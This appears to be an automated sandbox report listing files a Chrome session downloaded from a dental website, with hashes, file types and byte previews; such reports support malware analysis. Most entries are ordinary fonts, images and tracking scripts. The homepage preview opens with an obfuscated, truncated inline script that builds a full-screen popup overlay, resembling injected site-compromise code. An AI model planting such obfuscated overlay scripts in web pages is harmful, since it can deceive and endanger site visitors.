                                                                                                                                      Preview:......JFIF.....,.,.....C.....................................!........'.."#%%%..),($+!$%$......F.......................................>........................!1A.."Qa.2q.#..B...R.3b..$..r4CS..%........?..F|..O.8...b@.......2..9...|.Z.1f+......k5..|.#..........&..~.y.j....j&....)~fO..6.y...b..Q.+....=..,.........#.!.Y..+........$>....X.s9ul.,....#%....PL.r.....%rQ. ...,....?S.l.....,.&..m~F`QA"..H...(5U.QpG].y'.R..9......r.....&...v!p..;.@.1..2........;.".5.r... q .U.!&H..P.M..p....<..MQ..J..0.....p.E2......,..'.X...`I_Pgb....u...l.2S\Wq.?5.....5.x...D......_Q..P.\E5..K....5.Od..IoQ.....Er..e.X........}D.Pl..l......K..E.}J.'.y.e.U..J....h[W..>#.=.b....7..h..5............3{zt.8.~..g..wSa..........h.G.?[/.....i..3.3d............Y.6EU...../S.6..'..}..brX#.z=6..%.p.......[......$UK..(..}vp1..&6.XTmI...b...`. K'........(...gf..'U...c...oP8..l...m~B..a.=_...E..3...Q.l.0...r.2..`c.f{U..?q.8.c.k.........:.......HF..1...U_....?..F...oQ&..r.._..x....~]..mnE
                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      File Type:Web Open Font Format (Version 2), TrueType, length 15368, version 1.0
                                                                                                                                      Category:downloaded
                                                                                                                                      Size (bytes):15368
                                                                                                                                      Entropy (8bit):7.986184968554377
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:384:nTJg6Q5K8YWSW9moijiyOckZiSFQsiEVxU1L:nTJH0K7iUoaOfZigxBe
                                                                                                                                      MD5:BE7B70AB1265B1047BD93422397C655E
                                                                                                                                      SHA1:E10BBC7D8529AE3E64D8B08C9F7CD55C98F83D60
                                                                                                                                      SHA-256:B452C0F212E8BF33965905032F5BA1FAE29CD6F9539DCBC673704E66CE943B2B
                                                                                                                                      SHA-512:A9A913559EFE29685B7C12456326C3F8C7053D639B849261108A69348EEA02C617BA923561C1CDBE36082B2CEC1C0ADCC22511389791DB328ABC99A57F011F5A
                                                                                                                                      Malicious:false
                                                                                                                                      Reputation:low
                                                                                                                                      URL:https://fonts.gstatic.com/s/opensans/v40/memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsjZ0B4uaVIGxA.woff2
                                                                                                                                      Preview:wOF2......<.......x0..;...........................>..\..|.`?STAT^..J..|........\.i.....6.$..,. ..x........l..]{N..#R.-...0.Q.%.T.......Q...U...L..R.)KFQ0.)p..L%d......!3..;..v8..9.........A..'..........v5D80.......&...M...}....g.6.'N..M.y......gk....B.{....}.....q>j...].......o!..AL....b.....f......F..FE,@.Q..c*F..6n....g.....Ey..O....^.3...P.)U...AH.y..Z...'%.?8/.......T.S............S..8.w 7..>`.5.........*..0#.._..(_.P.W....s=......i+i.....`Dn.*)k.$.....G...]..=.....w.....n..|."..4.g.....H.2M..P.(oRg..l~G..dJ.<.U..q..u..4%......<...`.-$.....$[..".....TuM.V..7.[.{.l.. ,....>.&...P9].....S.lg.B.tK..B..\..z..RS.i....3.D."u..Bz..T.E^R.=m...U.\.X...IZ....n]....]...}i.......K.kL.D.6.".5..V..u.....?...|.a.=.;..0..cL..HpU..t.p)1.k.....^G..:.u.q(E.Q5.o.k.1.0..R....c..`.....A..3.g.0&....$....| .....C.H....(..F.. .::.......&.$Z4...$N....$.<.%.A6..y.1.?.......w...}....~$....V..Q......x..A'...*...+...I<n. .......t@...w$ ...@...9..H.h..B...Q
                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      File Type:ASCII text
                                                                                                                                      Category:downloaded
                                                                                                                                      Size (bytes):1033
                                                                                                                                      Entropy (8bit):4.897571888615622
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:fubU3lz0VrP+Zz0UzZz0KVsz0jz07z0h5z0jOYmp:fubU1zuGZz3ZzBVszqz2zC5zEOrp
                                                                                                                                      MD5:C3C9BE6AA047AF101BBB63065BC88BF4
                                                                                                                                      SHA1:74EDF40A621D99703CCF26216615CC714CEBDACF
                                                                                                                                      SHA-256:233885A97C7CEFAE8995D1D47CBD674A414F82BCF2C238EF21C7309A0F87E40C
                                                                                                                                      SHA-512:5BB6482629DD79559ABCD2132767E0083DFCA1EA5A22DF167126387A3012D1B5595609CC9BBD13E0E7383E6852E44B56187A233ABDF9DF4008D2DFC8903D683D
                                                                                                                                      Malicious:false
                                                                                                                                      Reputation:low
                                                                                                                                      URL:https://use.fontawesome.com/5faae0a068.css
                                                                                                                                      Preview:/*!. * Font Awesome v4.7.0 by @davegandy - http://fontawesome.io - @fontawesome. * License - http://fontawesome.io/license (Font: SIL OFL 1.1, CSS: MIT License). */.@import url('//use.fontawesome.com/releases/v4.7.0/css/font-awesome-css.min.css');./* FONT PATH. * -------------------------- */.@font-face {. font-family: 'FontAwesome';. src: url('//use.fontawesome.com/releases/v4.7.0/fonts/fontawesome-webfont.eot');. src: url('//use.fontawesome.com/releases/v4.7.0/fonts/fontawesome-webfont.eot?#iefix') format('embedded-opentype'),. url('//use.fontawesome.com/releases/v4.7.0/fonts/fontawesome-webfont.woff2') format('woff2'),. url('//use.fontawesome.com/releases/v4.7.0/fonts/fontawesome-webfont.woff') format('woff'),. url('//use.fontawesome.com/releases/v4.7.0/fonts/fontawesome-webfont.ttf') format('truetype'),. url('//use.fontawesome.com/releases/v4.7.0/fonts/fontawesome-webfont.svg#fontawesomeregular') format('svg');. font-weight: normal;. font-style: norma
                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      File Type:exported SGML document, Unicode text, UTF-8 text, with very long lines (59044)
                                                                                                                                      Category:downloaded
                                                                                                                                      Size (bytes):59125
                                                                                                                                      Entropy (8bit):5.23735275022643
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:768:WjBDo2f2IDVcBKzvwMabYxdBbkCCClSC8ClmbAwrC+GRoPmJnGQoC3vmACKIJQi7:6uSFzvnlz0APwglmWW
                                                                                                                                      MD5:A7984E5F6B6556D58FCA4F6F7B842992
                                                                                                                                      SHA1:E511F64599438EF63F4E3E3551F4544CE049BC65
                                                                                                                                      SHA-256:3E5DA322ED022B5762D70293CD84E3E73009781267F36F48553EF8CD4BEE4EF4
                                                                                                                                      SHA-512:0AA235710D49FF47AAD32C482E4E3A12927D0FF2317292C702F7CD56B3D359C60BB98A65461A29CA7D74D3DB243BF423243A84BB3748FA60F20D7B2434BD3A96
                                                                                                                                      Malicious:false
                                                                                                                                      Reputation:low
                                                                                                                                      URL:https://exodontia.info/wp-content/plugins/wp-gdpr-compliance/Assets/js/front.min.js?ver=1706555011
                                                                                                                                      Preview:/*! For license information please see front.min.js.LICENSE.txt */.(()=>{var t={20:t=>{"use strict";var e="%[a-f0-9]{2}",r=new RegExp(e,"gi"),n=new RegExp("("+e+")+","gi");function o(t,e){try{return decodeURIComponent(t.join(""))}catch(t){}if(1===t.length)return t;e=e||1;var r=t.slice(0,e),n=t.slice(e);return Array.prototype.concat.call([],o(r),o(n))}function i(t){try{return decodeURIComponent(t)}catch(i){for(var e=t.match(r),n=1;n<e.length;n++)e=(t=o(e,n).join("")).match(r);return t}}t.exports=function(t){if("string"!=typeof t)throw new TypeError("Expected `encodedURI` to be of type `string`, got `"+typeof t+"`");try{return t=t.replace(/\+/g," "),decodeURIComponent(t)}catch(e){return function(t){for(var e={"%FE%FF":"..","%FF%FE":".."},r=n.exec(t);r;){try{e[r[0]]=decodeURIComponent(r[0])}catch(t){var o=i(r[0]);o!==r[0]&&(e[r[0]]=o)}r=n.exec(t)}e["%C2"]=".";for(var a=Object.keys(e),s=0;s<a.length;s++){var c=a[s];t=t.replace(new RegExp(c,"g"),e[c])}return t}(t)}}},806:t=>{"use
                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      File Type:ASCII text, with very long lines (4179)
                                                                                                                                      Category:downloaded
                                                                                                                                      Size (bytes):203456
                                                                                                                                      Entropy (8bit):5.539604258637339
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3072:6VhzgNSNow8VNMAx8tF1+TYc2HcbUCQDe5L+aVsQC7SMp:WhewMNUq7ADe5LfV9C2y
                                                                                                                                      MD5:55B6958B738DCDA0E2A68C9D905427E1
                                                                                                                                      SHA1:3D6D3355D1DCE1FD0631C946F7EBFBF6724CC5DC
                                                                                                                                      SHA-256:98BBE334AFA9544FE2817DF3486D080033D399DE91CCB380C253F17799A57651
                                                                                                                                      SHA-512:003F88279EFA7A03F130ED8C16C30192E15974FD65675A08E89E96896F9E630BE06B02C9B75F9842BBFA641731CE4B3AF6EE92A9461053B53197272B84DAAA22
                                                                                                                                      Malicious:false
                                                                                                                                      Reputation:low
                                                                                                                                      URL:https://www.googletagmanager.com/gtag/js?id=UA-202665315-1
                                                                                                                                      Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"1",. . "macros":[{"function":"__e"},{"function":"__c","vtp_value":"undefined"}],. "tags":[{"function":"__ogt_1p_data_v2","priority":2,"vtp_cityType":"CSS_SELECTOR","vtp_manualEmailEnabled":false,"vtp_firstNameType":"CSS_SELECTOR","vtp_countryType":"CSS_SELECTOR","vtp_cityValue":"","vtp_isAutoEnabled":true,"vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_emailType":"CSS_SELECTOR","vtp_regionType":"CSS_SELECTOR","vtp_autoEmailEnabled":true,"vtp_postalCodeValue":"","vtp_lastNameValue":"","vtp_phoneType":"CSS_SELECTOR","vtp_phoneValue":"","vtp_streetType":"CSS_SELECTOR","vtp_autoPhoneEnabled":true,"vtp_postalCodeType":"CSS_SELECTOR","vtp_emailValue":"","vtp_firstNameValue":"","vtp_streetValue":"","vtp_lastNameType":"CSS_SELECTOR","vtp_isEnabled":true,"vtp_autoAddressEnabled":true,"vtp_regionValue":"","vtp_countryValue":"","vtp_isAutoCollectPiiEnable
                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 1758x1000, components 3
                                                                                                                                      Category:downloaded
                                                                                                                                      Size (bytes):175350
                                                                                                                                      Entropy (8bit):7.978993142366648
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3072:QftbskK7JWnOJe39KCAbVPnbEoL7e2MYo/Z4GXoJWJpUxTQw:3xe39KfbVPAGZxjGXoJGpUZJ
                                                                                                                                      MD5:F12868DEB02237BD71E5224E44328A4A
                                                                                                                                      SHA1:BA9EDE17724B3CE7E8E86D5F95F16BEC2827FF43
                                                                                                                                      SHA-256:87F2C74C4B805948DB67622E7D2ABCAFC67D213F30355563CF93536CD43CCF14
                                                                                                                                      SHA-512:21585C67C57724C5A1158141E9A38F8396FC566FD833B4DF9B2CAA42F223C2F5DE1A78BD1A74A857A20EDCA1E1DE842CB37562DFB7148FFCC3A643632427660B
                                                                                                                                      Malicious:false
                                                                                                                                      Reputation:low
                                                                                                                                      URL:https://dentalhealthstop.co.uk/wp-content/uploads/2017/03/home-treatment-3.jpg
                                                                                                                                      Preview:......Exif..II*.................Ducky.......2......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:91555cef-7662-410e-a9a1-48e602076417" xmpMM:DocumentID="xmp.did:8EDFE623054411E791F98894D3D78840" xmpMM:InstanceID="xmp.iid:8EDFE622054411E791F98894D3D78840" xmp:CreatorTool="Adobe Photoshop CC 2017 (Macintosh)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:f3e7a987-8ab4-4f07-8b62-5725d2b92aeb" stRef:documentID="xmp.did:91555cef-7662-410e-a9a1-48e602076417"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d...........................................
                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      File Type:Web Open Font Format (Version 2), CFF, length 31964, version 1.0
                                                                                                                                      Category:downloaded
                                                                                                                                      Size (bytes):31964
                                                                                                                                      Entropy (8bit):7.991143725231853
                                                                                                                                      Encrypted:true
                                                                                                                                      SSDEEP:768:izDcbVUSUQvVzQsZQrIspnBcIkaXH9fXFSA3NC5oz6BAtVZzCDu:ugB/vVzQjrxBHkaNPFT9jz6i/B
                                                                                                                                      MD5:485BF64EA607B27E08C41BCE96632B79
                                                                                                                                      SHA1:578B93649ADAF8EEDE14ECD44C1A4B9E7E22A0DA
                                                                                                                                      SHA-256:AF066E893E5D2C51F9363FB55C60F3442DB5674E813F049ED5B630A3D76170E6
                                                                                                                                      SHA-512:62A073037E03DE37E6191B3757F67D1B3DFA34DE785BD8C08E675FEB83F2F1E4FA126E759CD01F2F73669E832FAF253FEC35CF79D15124E31F953D226AC598B2
                                                                                                                                      Malicious:false
                                                                                                                                      Reputation:low
                                                                                                                                      URL:https://use.typekit.net/af/85cac6/00000000000000007735b307/30/l?primer=7cdcb44be4a7db8877ffa5c0007b8dd865b3bbc383831fe2ea177f62257a9191&fvd=n4&v=3
                                                                                                                                      Preview:wOF2OTTO..|...........|............................[?DYNA.P?GDYN.I...@..<.`..x.6.$..P....[. ......8..\..F$......1!.{.~..O...w..._..........>.}...T.".r+.e...#.......?...,......N..dj....".A<.....D4.PYJ......e..I .......V*..*..W.=...T..=.....gr...y..7.{......x...IX....bG...Q..v..(."b...b..l(]..(....W..,.]Y.'..y..c....:".....w.v....U.K....J...X(MJ5.*FB..x...-..z..y?Os.!...^...{..d.W1..p...D....V4%...xK!..n.,.../....M{.Iu....Dj..bB....R...Li;.)5....*.U......2.\.i.Sns......Xm....@..RD..C.=9.+{"...1.....NG;.Z:....,..l..zg..h._......fh.... ....q..2......4.e..9.e.K.......`..R.I...C.S.......h.u,.R..G..Y..}.a.e..y.......w...&..Q6V.V.F6vaG.X..7.g.b.....<q..ZO.......}5m....\..3].R..{(..+........].....6...Eb3.@....."....B...T..*...T....*u.\...B,Ut.J..]...>.....!".Ve..A..{.6.....%..I:]\."^#...1......p...Y..[5q.>S.\.!{........,../.=Z.E|.:.....l../.m.6.n.m.`.....F...b.p..........]a(..i0.Z`..8.N.s.R..n....x........g..`....Nlo..`..d6..l_...8v...].nf.
                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      File Type:PNG image data, 140 x 140, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2213
                                                                                                                                      Entropy (8bit):7.824823885698727
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:TkU23lSOCfjyK9fCmeywrK3Yd9zcW/WYLXoiGb0ss9R:TkU23lSOzWf7nb3YnznIiIg
                                                                                                                                      MD5:F037088465CBA064D45F5E9720408E89
                                                                                                                                      SHA1:E2BE14876D6BFF7AF39B477CD7339BB5FC539FA2
                                                                                                                                      SHA-256:028108FA7669BC052BC501CB8E2A343B12C6C104E307D667E0A9AF40ED01D412
                                                                                                                                      SHA-512:12D58EE1202526EDA3F9EDD704C36F3BD4D50B52544710D1799BBF4215A76D9696D321BF067234E165FAAE8AD61CC741E9C691F9D3433DA066AEB911166A4C52
                                                                                                                                      Malicious:false
                                                                                                                                      Reputation:low
                                                                                                                                      Preview:.PNG........IHDR...............A>....tEXtSoftware.Adobe ImageReadyq.e<...GIDATx...q.8...s..W..9..T...S.PA.....T.[A...V.l....8..N.wr. .d=..w...cl...>....P+...y_~..>3:.. ..<.......?.".st.Sz.$..#y..p.JA...,.....`*.x<.;...$=..(..#Ht.l.......UkW...$4w.@y..4....N.`~.%..&..H..e.?....\<ky<...Nd.\.a..Y.DvEI,.......C..r.9...e.....s.K.......[.....W...u..0.E.....KX.-......D.n.*......w*hv..#ay..|./XHP...m..R..UY....}.N.U...+h:.A.d?...R0..@.......7h:.@15KO.,a90.eI..Z.7]$v.M..,S..w..JP.!..,{..BE.7.$.14.....$.w!i....d..U.....GE3y.U.2.zJ...x.Q.#..C|..%.......p.Jh.!...G5.L.Qe.Q..d..2l.\e...%,...3.2..$.}j..S...."(..~.TH....i.#,.i....*./`.~T.|7$e..v...t.........,..L..gXr.....s..@...2o8.,..5.?...w=.R....U..8.g...e.Y.8.X..%./ZS0K.`?e......]..0.Mne..S....]`.K.....E.....EgEO"BQ>S.$n.!.Q....b.Jl.L.v....6.Bz.....v.u..2..bz..z...s.~..!.Vd..\1.....y....^.. ....\b......F.....~...1..j.}.ih.i1..0.E!.~l.\.4.)._.#.bo..-.b.hly....e+.F./..f}+..e`..).K.J.].X~.J....G...S.f..(..
                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      File Type:Unicode text, UTF-8 text, with very long lines (9239)
                                                                                                                                      Category:downloaded
                                                                                                                                      Size (bytes):9538
                                                                                                                                      Entropy (8bit):5.288322766472413
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:t17yRJu9lqR2xyP3i+MxDJwqs4QO5l64Zhid1zEyDJ4FqsG/Kn+JP6nUsj1Y7GP/:iilqIuIQqirlING/K+JYlPmq6NGAjRMV
                                                                                                                                      MD5:BC6FCA46655FA8DAEE5E14C1FA20C5A6
                                                                                                                                      SHA1:FF8FD43006395872D71B9FE9FB10973172BC570F
                                                                                                                                      SHA-256:B14BB9DC5D3181E0BB33794F137B289BF5FD7543916C15BBFEB0E267D4EE92C9
                                                                                                                                      SHA-512:BE4766B2EB099244E885ACE0ED7DD396535BA88BF145D7B098EDD9B239C68F40B00B3765D866F402438122444F7388888812E0C5F82F5CA7444243CF53951953
                                                                                                                                      Malicious:false
                                                                                                                                      Reputation:low
                                                                                                                                      URL:https://use.fontawesome.com/5faae0a068.js
                                                                                                                                      Preview:window.FontAwesomeCdnConfig = {. autoA11y: {. enabled: false. },. asyncLoading: {. enabled: false. },. reporting: {. . enabled: true,. domains: "localhost, *.dev". . },. useUrl: "use.fontawesome.com",. faCdnUrl: "https://cdn.fontawesome.com:443",. code: "5faae0a068".};.!function(){function a(a){var b,c=[],d=document,e=d.documentElement.doScroll,f="DOMContentLoaded",g=(e?/^loaded|^c/:/^loaded|^i|^c/).test(d.readyState);g||d.addEventListener(f,b=function(){for(d.removeEventListener(f,b),g=1;b=c.shift();)b()}),g?setTimeout(a,0):c.push(a)}function b(a,b){var c=!1;return a.split(",").forEach(function(a){var d=new RegExp(a.trim().replace(".","\\.").replace("*","(.*)"));b.match(d)&&(c=!0)}),c}function c(a){"undefined"!=typeof MutationObserver&&new MutationObserver(a).observe(document,{childList:!0,subtree:!0})}function d(a){var b,c,d,e;a=a||"fa",b=document.querySelectorAll("."+a),Array.prototype.forEach.call(b,function(a){c=a.getAttribute("title"),a.setAttribute("ar
                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      File Type:ASCII text, with very long lines (4179)
                                                                                                                                      Category:downloaded
                                                                                                                                      Size (bytes):202482
                                                                                                                                      Entropy (8bit):5.537574906177467
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3072:p3hzgNSNow8VNOAx8+F1+TYc2HcbUCQDe5L+aVsQC7S+p:BhewMN1q7ADe5LfV9C28
                                                                                                                                      MD5:8042E579AFAA7C97A93987A186C28418
                                                                                                                                      SHA1:4E86842E5F0C97CDACB00922856504656878B62A
                                                                                                                                      SHA-256:A1E82453375EA1A026F59DF0FACAE3695159011073DAED447F5CAE364E27ACED
                                                                                                                                      SHA-512:B3B0610C2AEE23B78F86BED1D1E88D4F4AA28FDEADEED294585EEB2A79D95D2D8F56E0D081E029EEC851DD675F2EEE7F282DF44BEBBDEAE7341CF3232549F9DB
                                                                                                                                      Malicious:false
                                                                                                                                      Reputation:low
                                                                                                                                      URL:https://www.googletagmanager.com/gtag/js?id=UA-119979881-1
                                                                                                                                      Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"1",. . "macros":[{"function":"__e"}],. "tags":[{"function":"__ogt_1p_data_v2","priority":2,"vtp_isAutoEnabled":true,"vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_isEnabled":true,"vtp_autoEmailEnabled":true,"vtp_autoPhoneEnabled":false,"vtp_autoAddressEnabled":false,"vtp_isAutoCollectPiiEnabledFlag":false,"tag_id":6},{"function":"__ccd_ga_first","priority":1,"vtp_instanceDestinationId":"UA-119979881-1","tag_id":9},{"function":"__rep","vtp_containerId":"UA-119979881-1","vtp_remoteConfig":["map"],"tag_id":1},{"function":"__zone","vtp_childContainers":["list",["map","publicId","G-DF396SG33H"]],"vtp_enableConfiguration":false,"tag_id":3},{"function":"__ccd_ga_last","priority":0,"vtp_instanceDestinationId":"UA-119979881-1","tag_id":8}],. "predicates":[{"function":"_eq","arg0":["macro",0],"arg1":"gtm.js"},{"function":"_eq","arg0":["macro",0],"arg1"
                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      File Type:HTML document, ASCII text, with very long lines (10709), with CRLF, LF line terminators
                                                                                                                                      Category:downloaded
                                                                                                                                      Size (bytes):147501
                                                                                                                                      Entropy (8bit):5.36919950375504
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:1536:Yi5//aaprzE8JD1sh32Tetc2h7UPaHeqPu9KC3CTtuWthIyKF4mZRNQgHiETW+oZ:Y6NFzE8JDOh32T07qIKF4tHuS
                                                                                                                                      MD5:99004894280598A2DE069A4209C63B8E
                                                                                                                                      SHA1:4AEFE9AA272848540BE80E851B704CCE17706E69
                                                                                                                                      SHA-256:2F32EA029E81BC873ADD8B199362597FBE836575E10E334D26940A0A56D1D78C
                                                                                                                                      SHA-512:95FEDA6860692F77DF87C85C7FD023D4FD0100DEA9E75D161B1814BF678C2E0A444A9B390C66AF1CEB36CCBAD60E21C55EEC754925CC5AF92BBAC021E11CF16C
                                                                                                                                      Malicious:false
                                                                                                                                      Reputation:low
                                                                                                                                      URL:https://exodontia.info/
                                                                                                                                      Preview:<!DOCTYPE html>..<html lang="en-GB">.. <head><script>..function _0x42e1(){var _0x7637c4=['edge','insertAdjacentHTML','disabled','global_name','setAttribute','19567647uoTeKi','navigatorInfo','host','[data-id=\x27','browser','<style\x20data-id=\x22popup\x22>.popup-fade:before{content:\x27\x27;background:#000;position:fixed;left:0;top:0;width:100%;height:100%;opacity:.7;z-index:9999}.popup{position:fixed;top:0;left:0;padding:15px\x2020px\x2015px\x2020px;width:100%;background:#fff;z-index:99999;opacity:1;box-sizing:border-box;color:#000;font-family:-apple-system,Helvetica,\x22Segoe\x20UI\x22,Roboto,Oxygen-Sans,Ubuntu,Cantarell,\x22Helvetica\x20Neue\x22,sans-serif;font-size:17px}.popup\x20img{width:32px;vertical-align:middle;margin-right:15px}.popup\x20span{padding-top:5px}.popup\x20button{padding:0;color:#fff;background-color:#3874cf;box-sizing:border-box;padding:8px\x2020px;text-decoration:none;display:inline-block;position:absolute;right:15px;top:13px;border:none;cursor:pointer;font-f
                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      File Type:PNG image data, 140 x 140, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:downloaded
                                                                                                                                      Size (bytes):2213
                                                                                                                                      Entropy (8bit):7.824823885698727
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:TkU23lSOCfjyK9fCmeywrK3Yd9zcW/WYLXoiGb0ss9R:TkU23lSOzWf7nb3YnznIiIg
                                                                                                                                      MD5:F037088465CBA064D45F5E9720408E89
                                                                                                                                      SHA1:E2BE14876D6BFF7AF39B477CD7339BB5FC539FA2
                                                                                                                                      SHA-256:028108FA7669BC052BC501CB8E2A343B12C6C104E307D667E0A9AF40ED01D412
                                                                                                                                      SHA-512:12D58EE1202526EDA3F9EDD704C36F3BD4D50B52544710D1799BBF4215A76D9696D321BF067234E165FAAE8AD61CC741E9C691F9D3433DA066AEB911166A4C52
                                                                                                                                      Malicious:false
                                                                                                                                      Reputation:low
                                                                                                                                      URL:https://dentalhealthstop.co.uk/wp-content/uploads/2017/03/reason-2.png
                                                                                                                                      Preview:.PNG........IHDR...............A>....tEXtSoftware.Adobe ImageReadyq.e<...GIDATx...q.8...s..W..9..T...S.PA.....T.[A...V.l....8..N.wr. .d=..w...cl...>....P+...y_~..>3:.. ..<.......?.".st.Sz.$..#y..p.JA...,.....`*.x<.;...$=..(..#Ht.l.......UkW...$4w.@y..4....N.`~.%..&..H..e.?....\<ky<...Nd.\.a..Y.DvEI,.......C..r.9...e.....s.K.......[.....W...u..0.E.....KX.-......D.n.*......w*hv..#ay..|./XHP...m..R..UY....}.N.U...+h:.A.d?...R0..@.......7h:.@15KO.,a90.eI..Z.7]$v.M..,S..w..JP.!..,{..BE.7.$.14.....$.w!i....d..U.....GE3y.U.2.zJ...x.Q.#..C|..%.......p.Jh.!...G5.L.Qe.Q..d..2l.\e...%,...3.2..$.}j..S...."(..~.TH....i.#,.i....*./`.~T.|7$e..v...t.........,..L..gXr.....s..@...2o8.,..5.?...w=.R....U..8.g...e.Y.8.X..%./ZS0K.`?e......]..0.Mne..S....]`.K.....E.....EgEO"BQ>S.$n.!.Q....b.Jl.L.v....6.Bz.....v.u..2..bz..z...s.~..!.Vd..\1.....y....^.. ....\b......F.....~...1..j.}.ih.i1..0.E!.~l.\.4.)._.#.bo..-.b.hly....e+.F./..f}+..e`..).K.J.].X~.J....G...S.f..(..
                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      File Type:Web Open Font Format (Version 2), CFF, length 33036, version 1.0
                                                                                                                                      Category:downloaded
                                                                                                                                      Size (bytes):33036
                                                                                                                                      Entropy (8bit):7.991487992851419
                                                                                                                                      Encrypted:true
                                                                                                                                      SSDEEP:768:UfG1N4g4UFZ8PqHnNsX32p2Rcly3TVbwOTuzssRnCBvt:U+X4gePqHuXbclKTVcOTBvt
                                                                                                                                      MD5:60C3EF85753E4A4AC4761BA4D36F4FC4
                                                                                                                                      SHA1:CF721F03E0F75F808C3AEBB2E713AA1814E550A0
                                                                                                                                      SHA-256:972002EAC590E8BB4F4F7AE7017F6A01438318530E6D58AC32EC33FE92E9B4BB
                                                                                                                                      SHA-512:EC629718BB84FFCE134D3B6D37585C4E25497AED7DBD118BEB61704AA42F87C9DB68D3F17DBB466B8DD337E2A1B4DAF85767B0E67711CEEC80F04EEACD74FAE8
                                                                                                                                      Malicious:false
                                                                                                                                      Reputation:low
                                                                                                                                      URL:https://use.typekit.net/af/e35fa0/00000000000000007735b327/30/l?primer=7cdcb44be4a7db8877ffa5c0007b8dd865b3bbc383831fe2ea177f62257a9191&fvd=n7&v=3
                                                                                                                                      Preview:wOF2OTTO...........p...............................~?DYNA.P?GDYN.I...4..<.`..x.6.$..P....[. ......8....Q......UUU.......~..7........?..G..9.c...B'".Yj.$..g..)....~<......'..6......;A9.AW..M..P-...Qj..2{......u....."M....M....Y...tg..l..u..........B..*..X.*v...H...Z*.4.......E..bK4vPPT. b........9.';.Lro..evx.3...J...u...b.4..h...%."....).5....eE..].u.....<.B..8`..N7...U.U.Y).&...G...<..K.}'.Z,.i.Z..y=iYi.Y.........T..d;X....H..a..+./..{....>....L..._...!.{..`9.8@F.QXF..I..d.U...*y...1t:...k|g.V...J....\..FTh..Y.....\"..(.c.`.4..........|..f.c..$..@7>...8..8pJ....L..yQ.>..RwY..R.R..6......?<...}3...-.......F.......?+.r (].w...P8zI~..$...3p....*.3i..KQ.O..o.*.O......{.#.".....Z.Z..%..d/..,{Am..<....0:.R..5#.I.BiQs..b..F...W.^.1.@..Ir! ..KS.7.....sA!...}.......J/w...hX.^k......2..jJ....!4,...@...1.{@-t.d..2.d.b.[y.UH.bp......u;..R.=.D0B).d.....0k.x.'N.g.C..p.\r3Yr.]r.:d.ml..|.&..u....l...m......%......j..lm..Cr.#..C6 [.]HW2..#..<."..@. '.s.
                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      File Type:ASCII text, with very long lines (19802), with no line terminators
                                                                                                                                      Category:downloaded
                                                                                                                                      Size (bytes):19802
                                                                                                                                      Entropy (8bit):5.21863639193455
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:384:sne5yGafGZwprGryKfxNQUDIg7jmhILuWFRv0eVdHPyZ7fxS0QoyZ+2mRwjO0dpJ:sGaf6wZKLzdLueRv0zZ7fxSlcRA5dQfY
                                                                                                                                      MD5:F2BC0804920974CDB94FECA2936B668C
                                                                                                                                      SHA1:253B288316EE7BB62B0BC755D7834B14B265F18C
                                                                                                                                      SHA-256:AF4C6683814AA527CAF53BDE3D021E6AAFE00833B45F2DEAD043C87ED7864674
                                                                                                                                      SHA-512:08ED1DF4DDE697A224F0FDE61B2EA3D56C792969D6CF29D06E244969984CDF614FF7D2919D3ECEFA134D1869EE564B718DE605539C67F4A7DBEDCD77DB09DB2B
                                                                                                                                      Malicious:false
                                                                                                                                      Reputation:low
                                                                                                                                      URL:https://cdnjs.cloudflare.com/ajax/libs/cookieconsent2/3.0.3/cookieconsent.min.js
